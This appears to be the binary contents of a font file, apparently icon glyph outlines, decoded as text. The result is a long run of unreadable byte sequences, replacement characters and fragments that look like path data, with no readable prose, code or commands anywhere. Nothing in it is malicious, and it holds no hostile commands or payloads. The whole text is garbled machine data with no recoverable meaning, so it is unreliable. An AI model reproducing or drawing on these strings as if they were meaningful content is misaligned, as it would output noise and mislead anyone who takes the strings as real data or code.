	Bja+1'2#"&?'.76����h8�h"1J�#��!-0L�#8y��y�(xN1#�TS��L(�TR(����@
Bja)%+#"&?'.7632���Z�9
Y+
*��&�f
*(
�����2:BJ{@x
+Bh[		[
[

[[
[

O

S
GHGDC@?<;87430.*(&$!
22+%2#"&'#"&5.5462;>32#"&'#"';>"264"264264&"4II4(A
�V{$/IhI/$I4�
A(4II4(A
�C:I4�
A9""�G""f""�IhI/%zV+
A(4II4(A
4I$/IhI/$+~4I$/�""<""�~""����<DLT^@[5*
"B
		
hh	
	[[OSGRQNMJIFE(("(
+%"&546754&#"'#""&5467546326=.546232264&""264264&"G%/IhI/$$?**>%$/IhI/$V<%%/IhI/$%<U�%""""�""~
A(4II4(A
M%,,%M
A(4II4(A
M<V%?
A(4II4(A
?%V<�""�""�~""����'?GOH@E87,+B[	[
O
SGMLIHED+%"&5467.5462&"264264&""&5467.5462"264264&"G%/IhI/$$/IhI/%"":""�/$$/IhI/$$/IhIl"";""~
A(4II4(A
\
A(4II4(A
�""�~""Y(A
��
A(4II4(A
\
A(4II""�~""����-5W_g\@YR+&	)	AB
[		[
[OSGeda`]\YXVT'+7"&5467547264&".5462&'656"264"&5467.#"&'.546232"264264&"�$/IhI/$='%5;""�$/IhI/%?#)8;""&0IhI,$]<^�
&0IhI,$\<^��V""f""~
A(4II4(A
N7 6�""�
A(4II4(A
T<#@�""�A)4II4'@9L|\A)4II4'@9L}�""�~""���y6Rp@m[[	
O


[[OSG87ONKIFDA@=;7R8R20-+(&$!65	+2#!"&546;2265#"&46;4&+"&5#"32+3%2+"&=#"&46;5462q4II4�4II4�"1��

��#0��

�wS"SS"&I4��4II4�4I1"�#

1"S

���"TT"SS���y *6^@[[
[	Y	
	[OSG-+"!30+6-6&%!*")  	+2#!"&546;2#"!4&+"&5265!3%#"&46;2q4II4�4II4�"1�H�#0M��w��&I4��4II4�4I1"S1"�#���""��ky(6��2.BK�PX@0	`[[\OSG@1	h[[\OSGY@53,*'%# 	
+2#!"&546;232%>3!4&+"&5#"!"!26N\
[6�5HH5�"1�(@
�iC��#0�mK��	O�0���5HH5�5H1"-&)�}1"�a��%���y *M@J	[[Y
O
SG"!&%!*")  	+2#!"&546;2#"!4&+"&5265!3q4II4�4II4�"1�H�#0M��&I4��4II4�4I1"S1"�#��
����&*.2@NRY]d�@�
J6

F:
B


hh

[	YYOSG_^TS43++''cb^d_d]\[ZVUSYTYRQPONLEC=;3@4@210/+.+.-,'*'*)(" 
&&+2##!"&="&=46;&546326325#'35#3"3264&3275467.#"#33#;#26=#�I4�`4IbV<>**><V9�}TTT>!	%&��%	!.��}}��TT�����4II4�� <V,,V< �SS�))}S$%%2&&2%%�S��#�#���������:_@\3,9	B

jh[	[		[OSG/.'%#"::+"264$2"&42#!"&46;5"'&46232654/762Z�aa�b�����`��n#Uyz�UV#RnMh&b�aa������"")n#U�yzUU#f��nM3����*2Q@NBjh[[	O	SG21.-*)3+"
+5"'&46232654/76232#!"&463462"�n#Uyz�UV#RnMh��`T�Γ��!)n#U�yzUU"f��nM3""9Γ�Γ
���y!@IS^fp�@�?<[VHDRL2*	B1+A[[[
[[

[		[

O
S

GhgUTKJBA#"lkgphpdc`_ZXT^U^PNJSKSGEAIBI>=;953/-)'"@#@!!+$"&462&"264"&462'"264&2#"'#"&57#"&546326 62?&#"27.#"%27.#"$"&462'"2654&5�zz�{�hIIhI�X<<X=i%$4%%@RT>" �rx�(AQPBO*O
O*��0"
>N#�iD[>AZC�C"
5&= ��X<=V=h%%4$%�z�zz��IhIIh��=V==Vj%%%2&�6$!22!$6(AA(^	'0$$0
	w=V==Vj&2%%%���y.7X@U-* B[
	[		O[		S	G7521,+)'#!..
+"&462"&4622#"'#"&57#"&546326 6$"&4632�{�zz�`=X<<X,@RT>" �rx�(AQPBO*O
O*�<X<<,+��zz�z��V==V=�6$!22!$6(AA(�V==V=���y%.;GT\t@qC@	X-	YE<, B[Ah	[		[

[OSGUUU\U\SRMKGF(+"&=467.""&=47'546 34367'54&+26>?& 6254'#"26=4'�VxV.%`�`%.VxV�6�e*0%<}O%4$5*
`��`J:��O$4%<%1l
S<VV<S/KB]]BK/S<VV<S
l��ܛ))O<%O��S$#S%%�)
``J:�OS#$S%%�)aO%>M)��(y@Bja#"+4632>32"'.'&�[rE ]2^�S�zy�S�]�_,3�^�SlU		UlS��(y'8@5BhiOSG''#"+4632>32"'.'&%>7654&"�[rE ]2^�S�zy�S�<�!>RvS�]�_,3�^�SlU		UlSX��'|!>\;SS;��,y2?@<
"BhiOSG/.*(
+"'.'&54632>32"67654&#""&54�
]�U�]rDa7]�U�`
�tS=?��?=R:;R"!AsU~]�^,2�]~UsB
GR;[=?��?=[;RR;;���&@?a+4&"67654&"mk�jI$�BIj�jpLjjLnIژBInLjjL����"/F@C&@[Y	
M	
SG/.-,+*)($#""#3$++#!"&=#"&547>?5#3&'33533v1#)2"�"1*#0?Ȋ���M}����}}�}l("1�#11#�1"%5�vv��?��M����������A� @@jja#33&+++"&=#+"&5#"&47��T}�}S��x
����#"��G�%*:�@�

B621)?	
Y

Y
ZYYMQE+++:+:9843/.-,'&%%$#"! +#5373#5#5335#53#'#53353#5!'7!!/#?!'R*.**�d*:��&u%�**%**hG2�����STK
�����>}..}>.}T)S**S))}**})S��CC�G�`?y**�K��Ay	 3CGs@p

Y[
[

[[		YMSGDD"!DGDGFEB?:70.-+&%!3"3  $+"3264&2"&4"&#"!.'"72!>3232>%#!"&5463!2!(2&%%iV==V=�'H# #�,2+�%>

��,,J/%71"�e#00#�"1S�e�%%$4N<X<<X��*TDa8�}?>9,$)'/'�"11"�"11���A�&*�K�
PX@:``Y
[	Z		M		S	GK�PX@;h`Y
[	Z		M		S	G@<hhY
[	Z		M		S	GYY@!'''*'*)($!	
+4272!7>32327676%463!2#!"&5!!���!)��
=%+:'.��0#�"11"�e"1�eV��)1J*+R,4
�"11"�#11#����
*4?JUp@m)	
QF;0	B
[
	
	[
[OSGUSOMJHDB?=9742.-(&" **$#$"+4&#"'&#"32?3262#"'#"'&463262?'&#"4632#"$4&#"326#"/7632-kIK4:95KIkkIK4:94KJk�m�MNlmLLmlNM�mnKK��
>- 78!�	=,!78 Jj4875j�j4884kP��MNLLNMښKK�
A>-56=	A>,55R��&:@7$B[OSG&&#$	+<627632#"/""2?'64&"j�5::4JIkkIJ59;4�i>-,@77[,,?87��j5784j�j5784- ,65�,@,65���� *D[@X</Bhf[[	O	TH,+"!?=9720+D,D'%!*"*&
+%#"'&?&'&6767&5462"3264&26?#"&?6&#"632W(
Jb�0*4)
3Hb�a7- J#11#"11n;
%*#6H;%*#6�$<?bWg.$<+*/EbbE2S*q?�1D11D1��
	5'SI^

	6&SI_��M�'+8@5hf[OSG(((+(+')'&+%6#"'&?6'&#"&7>32326742
C"W &*
	
C"Y&*	��F?;KS,?;KS-z����"�8@N@K+B[[[OS	G
@><:0." 

+"3!26'&"&547632#''.?6'&>67432#"�'�#4�4#���C]�2VU2�3)+c�
,
,m7667:,�e,?@,�,�{L@-0�UU�eUJJ�1%3$2%3$776��3�=N@Khf	[[OTH;821*("!	
+"&547632#"3264&6&#'&?6&'&76332>�C]�2VU2�+c�&'%&,


 $.

!$+KLA-/�UU�e,1&J&&&4'��3)<3);ay'C[@X:,B	j[[[
O
TH)(=;8710(C)B
+2#!"&5463!6'&#"3676'.26="/&47627!"3�EL$I4��4II4$�U}
� ^)"}F/Z��yxA.��4II4N4I)h�U#}$�AϤ$}D/���GP#5L@I-Bhff[OTH+*%$
##+%!"&546;2+"3!26=462'"/&4627>��4II4��M"I�o .<�-(�I4N4I"��}}4I�o. ;�
-�����P (2�@	 BK�PX@>`^
[
	
[		[[MRF@@hf
[
	
[		[[MRFY@*)/.)2*2&%!#
+#57&5462++35353264&""264'2"&46����В�h?S�TS�Eaa�b�J""*"11D21K��$'h��ВTTSb�aaE$!�5""B1"#12D1��2&=@:Bhi[OSG#!#+462+##"&/57&264&#"�z�zzVhST*
��D21#"1VVzz�{SS?�)'2D11"#2A&#'+/39AQU�@�'!#!#Y
	Y
%Z& M$Z($""$M($$"S"$"GRRCB::44RURUTSKHBQCP:A:A@?>=<;494987653210/.-,+*)('&%$#"! )+!!'3#53##5353#3#73#3#73#3#73#3#73#53533#5352#!"&5463!�$��}SSSS}}}***)))******)))******)))****)))}*}"11"�e#00#��eSSS�*S*S*)*}*)*}*)*}*)*}*S*S}*)**)$0#��#00#N#0�_N���b��B.@+B=<6/)("!
B@OSG32+"&=.546?>54&'5'&>5'&>54627676Į�"��ė���f�vv��f�	
�c	
D"D	b��V��%33%㐙��&#�ny��ym�#}�	��b	D��D	
b�����q�
,0H�K�
PX@Ah

^_		[
[

ZMSGK�PX@Bh

f_		[
[

ZMSG@Ah

fk		[
[

ZMSGYY@$--GFCB?>75-0-0/.+)


+2"&54&#"4"&5#"&=4&/&546 +75#654&#"354623683I0"%"S$65��96#T*�*�_^�*R/".
;I3		"0*�P}HNO_����aRMG}d**2=G^��^F=u;TT9���y%HPx�@"5
]TL> 
qhP,

GBK�
PX@H

`

`[
[
\	
	
[O[SG@J

h

h[
[
\	
	
[O[SGY@&RQomfd[YQxRxNMJIFD9742'&%%+"'&"32?32?64/764'&"&54?&54?6327632#"'.'7232?#"/764'&#"'&54?6u
H
$n$�&&G

G
&65&�%%
H
�-jL&>�=Y4,%65L&?�>Y3.�"2L"1&



�


�&
H
$$�&65&
G
&H
&&�%l%
H&

�]M46&.2Y>�=%M47$01W?�>Q2"M1"�
&



�&


���P&#J�@!1)E<BK�
PX@0j`^k[OTH@2jhfk[OTHY@IG@>53-+##$*	+#"/#"'&4?'&54?6276654/#"&4?'&#"76323274G&&�&65&
H

H
%%�%m%
G
G





�



&&H
&j&�&&
H&
G
%76%�%%
H
��



&
�

&��r3@@a+"/&'&7%6M03�;9�!3���9�G>�20.�
!/�&6P9����$�
(+%/.67%6&9�
� �	�9	� �&
����
#+E@B?[[OSG)(%$##

	+"7654'&'2'&6"32764.2"&4MgJII��HHJh��a��bĉ*>+,>gxVVxVPHGfeG��FfgFHS���`��`��>UU>*VxVVx����/@,?kOSG
		
+'&62764&#"��a��bĉ,>+*>����`��`��KU>>U��Gy'+�K�PX@5`[Z
	[
		M
		S	G@6h[Z
	[
		M
		S	GY@%(( (+(+*)$#' '
+642232#!"&546;54676"354&!�l6Db*"11"�_#00#*/$&.#1�1��_&llSbDT1"��"11"$"1T0KS1"}}#0��$����Gy(H@Eh[	[OTH   ( (%#	
+2#!"&546;5462264&"54&#"�"11"�_#00#*b�a�,  , �1"#11"��"11"$"1TEaaET�� ,  ,}#01"}���y-1�K�PX@4`[	\
[

M

S
G@5h[	\
[

M

S
GY@...1.10/+(#!
	
+64246;35467632"&=4&#"32#!"&5!!�l��0#}�9-#Db"1"#1*"11"�_#0�_&ll"1)}7O
bD}}#01"T1"��"11"$�����y&.?@<hh[[OTH%5#%	+2"&=4&#"32#!"&546;354264&"يa"1"#1*"11"�_#00#}�i,  , yaE}}#01"T1"��"11"$"1)}E� ,  ,����%H@E% BY[MSG#"	+2#!"&5463'!'"7'5!27%�#00#��#00#�A��A4���������0#��"11"w#0��9��92����@	������#(1@.('%$#"! Bjja	+"&54?>76/767'%*� ��3
�!��z}���Mz!��
���`
�
���x.}��7���+y����Gy*@@=@[[OSG
'$
+!"&463!2%"3!264&#!.'#!"&47��4II4M4II�M���"�"�k1"�_#0KIhIIhI�""��$���n#"11D��Gy*@'@jOSG
+%2#!"&463%#!"&47�"11"�_#00#�1"�_#0��1D11D1�#"11D��!9@6BOSG!!	+72#"&54672#"&546ʭ���c,,������c,,�����`,w,_����`,w,�
#@ BOSG%%%$+#"&54632#"&54632���c,,����c,,�`,w,�`,w,��P#/*@'[OSG+"&5462"2654"&5462"2654�hIIhIl"".hIIhIl""!I4w4II4��4���w��I4w4II4��4���w2�&@OSG+2"&54$2"&540F11F0TF00F0&1"��"10#N#00#��#00#N#�P(@%	BOSG
+>7/2"&546S#�$�#�nD11��`#�#�W��k1#�#1�P @BOSG%$+632#"'6M��:!#11#!������2"�`"2��P
$@!BOSG

+%"'67632M!��l!#11�h2"�`"2�P
@BOSG%!+7#"&54632�#"11"#� 1#�#1��2�&!@[OSG+"264$2"&4?�bb�b��В�В�b�bb���В��2�&@OSG+2"&4�В�В&�В���)@&
BOSG%%+2#"/672#"/67$��>,,��c���>,,��c����,��,�`J���,��,�`�#@ 
BOSG%%+2#"/67$2#"/67
>,,��c�>,,��c,��,�`,��,�`2�&(@%YMSG
+!!2#!"&5463���N#00#��#00#���0#��#00#N#02�&@OSG	+2#!"&5463�#00#��#00#&0#��#00#N#0��&",4>FNVk@h	?[
[
	[OSG65$#TSPOLKHGDC@?;95>6>21.-)'#,$,!
+2#!5#"&54634&#!"3!26%"&4632&"264"&4632&"264"&462&"264�4II4��}*4II4G���"11"#11""�#11#"11""�F00F1C""&I4��4I}}I4$4I�_$��P0F01D1}""d1D10F0}""d0F01DL""���P%@@=
B?[OSG%$
	+!";7!2654&'2#!5#"&5463q�}p4II4��}*4II4���$TI4��4I}}I4$4I�b�y-=�@
A	?K�PX@2
`[\	[		O		S	G@3
h[\	[		O		S	GY@<941(%" --
+2+'!"&55"&5463!235463!54&#!"4&#!"3!26k4II4*}��4I}4II4�4I���=+�)�!%��I4��4I}}I4}}I4#4II4���+>)��S#%����G�A��,BK�
PX@3	h`
[[OTH@4	hh
[[OTHY@
?>9832+)&# 
+$"&=462"326=4&32#!"&46;5.=46226=462i�bb�a�#11#"11�k}��}k�"{�z"�bE�EbbE�E�1"�"11"�"1��m�-""-�mSSVzzVS��G�3u�BK�
PX@*h`[OTH@+hh[OTHY@
#3)+$"&=462732#!"&46;5.=46226=462i�bb�a}�k}��}k�"{�z"�bE�EbbE�EEm�-""-�mSSVzzVS��/@,[OSG

+%!"&463!2%"3!264&#q�4II4�4II����IhIIhI�""��V@OSG+2#!"&5463G#11#�#01"V2D11"#1��A~ ,K:@7H9*)%$	BjjOTH"!B?!,",)+#"''.54?&5467676265'/64'$'&;254&547776.���_$ <
$�6*/$6f��1+���

����



��6BC.XxXC+W2?!.
q��I3uWWu5GQ�

�!;>C!Q"4y���y'7CO[gs�����@�	Y#	O

[	
	[
 
[%[O$![&"[MSG������ih]\QPED98�������������������zwolhsirc`\g]fWTP[QZKHDOEN?<8C9B63.+&#	'+2#!"&5463!!%+"&=46;2'+"&=46;2"&46;2#"&46;2#"&46;2#2+"&463"&46;2#%+"&=46;22+"&46372+"&4632+"&463A#11#�#00#N���N
*

*
}
}

}
>

*

*

*

�

}



}

�

*

�t
�

�


�

�

�

�

�

y1"�"11"�"1S����~~��

�q



S



}



*

N

~~��



S



�

���6P@M-, .!	BjjjO[SG541/)($"#%+2#"'#"&54675467%4675&#"2657&#"26G"2oMJ5X4MoF7*w�G6}���,=>V=�+==V=1"�YEa-(/bE5W� /4�/FH��5��1"#11#��1F00��q|&@#
@O[SG+6"&4635"&463467Z	IhII4�IhII4|
	�	+==V>���+==V=����#&0:DI@FD=;,+'&%$"!Bk[OSGCB97	+2+#"&776776'6'7%&6?'76&32?6654'&\Mp-�,Z&
��]K9�G#y?�r���
b�

	|%!Y �pM>-�Z]"
&J7��:G>�,�r��	�4�
�
+ ��� $(8@5('&%$#"!BjOSG  &++546762'27./7'	7'��8=��4�'4Y3��6*zZ3���6�64�8�>��	3Z3�7	>* Z3��C6�5��C�(2HK@H:9#"D+E*Bh[[OSGHFB@))'+#"/&4?627'&4?6327'&#"7'&"%>.'#"/32"	[J��kAJ%%B%f%:�:%%B$54$�-}-�.}."C�AN}�}(I��Eir�J�AJ%g%B%%9�:%g%B$$}#-}-��-}-B#&A|YO-}#�
~(����	+-@*+*	! BjOSG(+'&4?62'&54?62#"/7?654/7�B4�M�B5�TO��Q.����4C�r�BDU`�O�.��	����PDW@T81C<	
B[[	[	
	[

O

S
G@?54.-+2"&5"&="&47622764'&""'&"276726526=6>fJ%&2IhIIhI3J%Y�Y,u
 
'r'@�@"".B"BJ34%'�4II44II4�Jf%YYv#

''@@#	��F	.
��
2G�%D@ABhhOOSG%%+"&=&'&'"&5"&4762276/.C"C."#@�@(o(�#.
��
.	��F	#@@((����!,5@2%$+B?O[SG)++#"/7'.7632?6767667'#4�
U)/$&�ߟ�	7uP	7'G4+r�7V
`�M�E
);Rs$/��߆14(S��V6�u+-������y@B?ja("+%#"/7'&7632767>�
����
~ZH1,�f$-2
����-$e
�,2GX����+086@354&81/.BhkOSG%()+#"/#"'.>76?'&462676327'76?'�/3*nC�&-O!>
�
#D*)MI��Ye�ڕ�
s/�)!)C#�A@?"&�#Dp(4�ZeY
ڕ��<;�*S[B@?QP>=6/*#B[[OSG[YWUGE32'&+//"&'&6?5.6?54626&/54&"?7632>&/5432#") U.p%%\+0+\%%p.T&)�VxU�
�%2&�
�D
 #3*

 
D���[,+)
 #_())(_# 
)V\v�<VV<����%%��>�6
!	!
6�>�����$-D@A$
BhfiOSG&%+)%-&-! &+%#/#"/&'&6?5.6?5462'2654#"��DYXD�
�%2&?	�>>�67$$


6�>��%%��	��G�+/37=E|@y

B	YY

Y

YMSG4400,,DC@?<;98474765030321,/,/.-(%"!
+++2+"&=.'546;546;23546;2'35!355#&267!%5!!6	XE1#S"1F[)SSS}S��S}S�n�t��_�&�N{ �#11#� |M�}}}}}}}}}�<SS�R@?}ii

����7E@B		[
[[OSG7631.-######
+"&57"&4637'4622#'26=3264&+54&"#"3�hI~4JI4IhI|3II4{�"��"�KI4IhIz4JI4{IhI�3��"��"���y0@-O[SG
	+2#'"&57"&46;'462G#11#�1F0�#00#�0F11D1�"11"�1D1�"11"���A�'1;EOsw�@�q
hV_B
[


[	[[OSGttQPGF32((twtwvuomca][PsQsLJFOGOB@=<862;3;(1(0,+%##!#+"#54&";#"26=3264&+532645462#!"&4632"&=32"&46;2#"&'#"&5467.54632>#5�xVSVxVV<??<VVxVSVxVV<>><V�$4%%��%%%R4$>%�J%%?%]^�4--4�^9b  c9_�5--5�_9c  bYSyU<??<UUxVTVxUU<??<UUxVTVx{?$%%%4$%?��$?%%$4%?%��^9c  c9^�5--5�^9c  c9^�5--5��TT���y'1;EISv@s	[
[
[

O

S
GKJFF<<PNJSKSFIFIHG<E<D@?:9530.+)$# ''+#32"&=#"&46;5#"&46235462'3264&#"5#"2654&"35##3264&	??<VVxVSVxVV<>><VVxVSVxVV{?%%%�>%%4$$4%%�S�?%%%VTVxUU<??<UUxVTVxUU<??<UUxV�?%4$%�o?%%$S?$%%�TTS?%$4%����"7UM@J
0#B	h[[[OSGON&)$
+#"'&547654626%26=4&"2764'&'#"&5"&54764&"32654'&"]g�ghh5HIhI E��"")
++)|)++1#"1��o7#PPOpq�O#7#g���gh��h54II4
���+x+))+x+2"10#��oMN7"PopPO�qpO"7NMy*8@5h[OSG&% 	+%2654'&462#"&547626"&=462Lo7#PPOpq�O#7o^""moMN7"PopPO�qpO"7NMo�������3ALWa�@�=8BYO[

[		[[
[

O

S
GYXNMCB54]ZXaY`TQMWNVHEBLCK<94A5@1.+*%"35+2#!"&54635463!2!5"3!26=4&##!"&526=#!"'32+"&5432#!"5432+"&463G4II4�64II4w��$��%�%���"�`"9�	�	����		PI4�_4II4�4IS*��}i%%i}�����	��	�*����$w����@��x�yB

[		[
[[[[[OSG���������������������~|zvsmlfc_][YVTRPLICB<9"#!%2:"'+547&=46;>232+"'+"&5!54#"#"&463232=4&+"&7654&"+"327632#"'&#";26'&5462;266323264&#"#"25#"'&#"32763&7654&"66V<e�e<V66V<rABr<Vq
++	%r
7N7
r%++%r	
7N7
r%��
��C,�AAI<V>TT>V<IAAs<V66V<s7N6I%**%I
6N7s%**%B,?B,���dOC@@	
[O[SGHE?>85.,)' 
OO+"3276+"&7654&"+"&=463264&#"&=46;26'&5462;2'&�++%r
7N7
	s$++%s	
7N7
r&K6N7
	s%**%s
7N6
	I%**%I
���d3Oo@l@;0*)B9
G4NIB	

h
f[

[[OSGLK>=33%
+  &264&"%35&".'3654'#>7326=.467&'"&'>26�$��������**%M4	B	4L$**$L4	!4M>  ,6,!!,6,d����$�`���	! 	5L$**$L5	 !	5L%*%M4y,6,  ,6,  ��G&/;@8)B[[OSG#&#&+"&46232+5462>7#"&46;.'"&5���>W
OO
X="=Y
OO
X>"!���E
W>">X
OO
X>"=X
O���P4Gp@m
B
`O
[[[
	
	[OSGED@>9742/-('" 
+2 &63264632;54#"&#"27676&#"#"'327>?#"'&?"-+B���ÊJE'��V;."=#�0ATdGFFG�G
C%;,<+*
6A+
0PB>ΐ���  �pvV; �,03GF�FGG4&�+<'&+��#_@
 BK�	PX@`[OSG@ h[OSGY�$&#"+3267>"&463276#"&?&#"aV;%B
)
GȎ�dTA0$�#=#-;5vV%	&G�Ȏ30#�$=���P):J@G
	[		[[OSG7520+*&$!
+2#!"&5462654&"2654&#"322654.#"32}nɑVI4��EbI<D10F0�4$�p$$<V�4%v�w$$��PV��n4IbEw4I��1#"11"#1%p�%4$V<%%v�u$4%�����y(?@<[	[OSG	%#((	
+62"&42"&54&#"&462"&54&#"&460F11F0S�
�1F0�#00#��1F0bE#00�1D11D%���"11"��1D1�Ê"11"Eb1D1�af�>IT]�u@&:1	�f	*

�l)
x BK�
PX@Uh		fkO[[	
	[

O[

S
GK�PX@Ph		fk[[	
	[

O[

S
G@Uh		fkO[[	
	[

O[

S
GYY@<_^KJ@?������|zvtki^�_�[YVUPNJTKTFD?I@I976543-+>>+"'".'&#"327>&'&'732654'67263732&'&'"&?632!"&4632"&5432#"'#&/"'.6767#"&4632676?6�
;!NP!;.BB.:!E C��
?GE!:.A
+a

�O
�	
X2sP2 +2KJ3*&+PrrP/T$ 5['D
2��2B\A0m$Z J��+'/ePm0A., 
�&
%%
&�
	�
F7PsB3$VN+")��)"+NV$;:s�r+'>7K���q<DNVZ@W2&%
	B		hfi[
O
SGTSPOKJ)#+$)+'&#"'&/#"'.6767'#"&4632>?6;76264&"2654&"6264&"�
%M71&- $0Q��

K3&17MM7B,,,(D-l��""��"":
"(7M!13+:Bw	
��	--5p;2!MnM;ZZ9�""�		�""���y#)9T@Q	B
	[		[[OSG$$850-$)$)'&"	+2#!"&5463+"&5#"'3!26265754&#!"3!264II4�_4II4�?VxU?���=V>��_�yI4�64II4�4I��/<VV<��5+==+SSS	��"�!%)-26:BJ�@�B[Y
	

Y[[OSG33JHFDB@><:98736365421/.-,+*)('&%$#"	!!+2#!!2#!"'4&'#"&46;2#3'#3#3'#733537#432#"%432#"�*�(��6N:]	���}}}}��}}oЃ���>??>w>??>P��*"�"0TSSS*S�T*SSSS�u>>??>>?����3;CK_@\
	B

[[

[	[[OTHIHEDA@=<9854&$%"$"%+2#"'#"&5463263226=4&#"3276#"&54264&" &6 "264#�j&%#00"Q<;QV<,&

19Mo�""����6����nN
*1"#0H

<VU=<V!oMNx""���6�������	����'-9AG[@X6.,*(&$ FDB@>:0Bh[[[OSG=;97,	+ &6 "264$2"&4&'6'&#"6'7&67.'#"327&'67&����6���}������1%;@08 (0�ISS �2;`AC019W�F<4K�6�������l�����ZH52$ 	� .68(R#9vI5Q#
�"
>CP+O
A����(07I@F($"


641/-) Bh[OSG,*'%++  &&'6'&#"6'7&67&'#"'327&'>7&�6�����LAYkN^+,B3U�>U
��3�G_�jp'-cSm33
,��AQhc*�����6}jIU36�9
L]1goD=^�lR�92�Ixy5�$�Mp����/=@:+Bk[[MQE'!#&$	+#"'&54763246;#"3#67654&#"5#53�nܛ�nmml���>/::
SS]GV�xz�UG^SS6n���nm��mm��1ET
:S�GVxz��zxVG�S��wy,@)k[MQE!%+3###5354676;#"�}}}}}.FWW}��#}5(R3}����"*2M@J[	[[OS
G0/,+('$# 	+"'&547632"32654&"&462&"264"&462w�nmml��mnܛz��zx���V==V=N4$$4$�V==V=Knm��mmmn�����zx��xz��t=V==Vi$4$$4�=V==V���%@"[OSG+6"&462&"26462"&4�bb�a�F11F0ߊaa�b�b�bb��1D11D�b�bb�����9NY`@]6-3/)	B[
		[
[[OSG;:YXUSPOHFEB:N;M+�%+ &6 "2644632"7#+'#.547&7676326?27654&'&#"/&3'2#"&463����6���hEAAE(5!2!
�E!#	M  &"!E?K�6���������!.ELMD.!%#�2$#3r5G#	-CNJ@G%!
B*@[[	O	SG/.NMJHED;6.C/B+�#"
+$4632#"+/.547&767632676?27654&'&#".3'2#"&463_�/N4N dm/:W23%&%�j56, zA'.!53kb�,##,#4G�:'wjG4/4%<(1.��O":
.O�#,##,#����*7LX`h8@5(BBK�
PX@M[[

	
	Y[Y[[OSGK�PX@L[[

M
	YY[[OSG@M[[

	
	Y[Y[[OSGYY@+98,+feba^]ZYXWVUTSRQPONM@>8L9L20+7,7%$*+%#"&54763&547#"&5476;#'2654&#"2654&'#"7#53533## &6 "264�
F;35%)7&-!#4d!


2""!"%	0�***))*����8���%7)$0(!"
)!;:�"�*))**���8���������iP(8GS�@ML	BK�PX@B	`h^[
[
		YOSG@C	`hf[
[
		YOSGY@ :9*)SRQPONKJIHA?9G:G20)8*8%*'+%#"&54767&547#"&5476;#'267654&#"2654&'#"#53573##A	udT[>/p>K28Z�22;K
 	:."	909@#53$0QTTT)TT)�=]C2@$
P2@,.0@0
G*3c
!1a��1'('
(&,8,*OS*S����%|K�
PX@0`[	Y[OSG@1h[	Y[OSGY@
$#%
+  &"26473264&"265#"&5#�8�����F00F0"&��}b�b}�����8I1D11D�&� �zEbbEz����!1�K�
PX@3`
[	Y[OSG@4h
[	Y[OSGY@#"-,*)'&"1#0 	+2#!"&5463"26473264&"26=#"&5#3q5HH5�5HH5/jHHjH!&\Tx�xT�H5�5HH5�5H�HjHHj�&���XxxX�����Pj@gA'&@Bh	h[
[OT
HPOJHDB?=9731*(%#	+"'&547632"32654&254/&54327&#"#"/.#"327'#"&546323w�nmml��mnܛz��zx��S5)AG.+5$*(64'&	
TKnm��mmmn�����zx��xz��{7/4;+
3((!<*(6#%$(G~q�98@5)(B[OSG%#&%'#'	+%254/&54327&#"#"/&'&#"327'#"&5476323ݔ^/'16Hu~R12M^" IC230/DB(#.*7 &*'�~cQ

 %*[hJ	!'[HG11RM-. >#A.>0G~����'/Y@VB

[[
[Y		O	S		G
-,)(%$! 
#+%#53'4632"2#54#"#54'36 &6 "264%CCE$H�&(D!D:q����6����="!4+�y0~�8
#�4�6�������IPN@KBh		[M
[QE
	+7#32#54#"#'336%432#"}};FI}=1}c+��A@@A�
ZN��W1��w*SFu??>����HR@O'$Bh[	[[OTH;953-+HH
+ &6 "264%2#"&'&&5&?&5463232654&#"'&546����6����<MA4	
'0*0;-SK�6�������.J2@U
&-u !:C0$/=+A3T���Y5>@;	Bh[OSG(&" 55+2#"&''&?&5463232654&#"'&546	g�pX4
3
/*$3BQIReL�Y~Vo�V:@U8�#)7+9+tR?OiI+

nX�����Xx�@�
sc
kB		h	f	f[[		[

[
O
\
S

GZYnljh^\YxZxVTFD@>970/(&" 
+2654'654'&#"&#"327'463232654/&#&'.54632#".'&#"#"'&2632#"'#"'&547&5476�B_QPt(/C^RQt%"�
-.(* &XBF*#5(N<
[Gh*6/�jiGHe1)�kjFHcC$'wTSaD/&vUT�#	/"77!!
	+$<?@�mn�$**fIJmm�,6fHJ����\X@U		B[	O		[[
[SG! VTPN?=8620 \!\"*"%+%#"'#"'&547&5476326322654'&'&/&'&5463232654'&#"#"'&'&#"�GHe.,�kjFHf6/�ji��G[*N
)5#*FBX% *
(.-
&*�*)gIJlm�,6fHJmn��?<7		+

 !77"0	"3����$,�@BK�
PX@6`f		`[[		O		T	HK�PX@7hf		`[[		O		T	H@8hf		h[[		O		T	HYY@
*)$"
+%5#"&'&=35#5#3327 &6 "264�
LL-#2("8����6���4R3R

-q5��6�������J57@4BjYOTH&"+%5#"&'&=35#5#3327J)(&}}J
:% &D75V/�S�4*L�<!
	����*9E@'
#!BK�PX@=hf^^[	\		O		T
	HK�PX@>hff^[	\		O		T
	H@?hfff[	\		O		T
	HYY@;:,+A?:E;E42+9,9#"-+4626767#"'327.'327.5&547&"'&547632"32654&|(:
Y-<90/&#
7V�nmml��mnܛz��zx��Z(
	j:%#D�bnm��mmmn�����zx��xz����\+F@C(
	$"Bjh[OTH"."+46326767#"'327.'27.5&547&m[@D+023+-.00Ѕ�jkS4M
$4F(E~��@Y/
6/"m_a�EA>-T:0Q&&�����%-5�@BK�	PX@=hfff		f[		O		T	HK�
PX@Chffff		f[		O		T	H@=hfff		f[		O		T	HYY@
32#%&"
+>32#"'.'&#'76723276&#" &6 "264�3>
2.(-/)
x����6���W/C?=7#�4 +A:$�U�6�������3D+%@ @a+'&'&'&'7>763276&676DYXH* 
O3	T!,
	9.1#ALP�zji1$

	!A	4N$yl1@2#E����'0ELTdpy��c@!yvs\W&,-! 

BK�	PX@p`h

hY$[#[
 YP
Y"!	ZOTHK�
PX@|`^h`

hY$[#[
 Y"\
Y!	YOTHK�PX@p`h

hY$[#[
 YP
Y"!	ZOTH@qhh

hY$[#[
 YP
Y"!	ZOTHYYY@S��VU21����������xwutrqonihba_][ZYXUdVdRQNMLJHG=<651E2E%$#"''
	%+753##553#5&=3672#"&/#53654&672#6=3&=46354#"  &2735##"=#'26=4&"'#357#>574'.#'"32"=432�Z|f



T2
&&
��6�����!!	!j""W&(%'&5

d-.�	
d-.��

���wc�		
mdk H

�8eDQn!	

:&

�����6E�n	pznGGHsRRsI�?	?h		?g	pO

O�P@BOSG)'+! '&'&47676! 7'�		����z{���F�F7:j>�>j:�������&0BNd�@�	B

hh

[[
\	Y		O		T	HPOEC21`^[XUSOdPcKHCNEN@?=;761B2B0-*)$!
